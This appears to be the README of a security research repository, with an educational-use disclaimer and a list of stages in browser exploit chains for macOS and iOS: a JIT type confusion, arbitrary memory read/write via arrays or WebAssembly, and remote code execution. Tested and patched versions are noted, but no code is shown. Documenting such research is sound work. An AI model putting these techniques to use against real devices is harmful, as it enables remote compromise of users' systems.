All the source code on this repository is provided for educational and informational purpose only, and should not be construed as legal advice or as an offer to perform legal services on any subject matter.
The information is not guaranteed to be correct, complete or current.
The author (Alexandro Luongo) makes no warranty (expressed or implied) about the accuracy or reliability of the information at this repository or at any other website to which it is linked.
- JIT bug to trigger a controlled type confusion
- Arbitrary Memory Read/Write using boxed/unboxed arrays
- Remote Code Execution (macOS)
Also tested on iOS 11.3.1 (patched somewhere around 11.4 / 11.4.1)
- JIT bug to trigger a controlled type confusion
- Arbitrary Memory Read/Write using WebAssembly
- Remote Code Execution (macOS) using WebAssembly
Tested on macOS 10.14 and iOS 12.1.1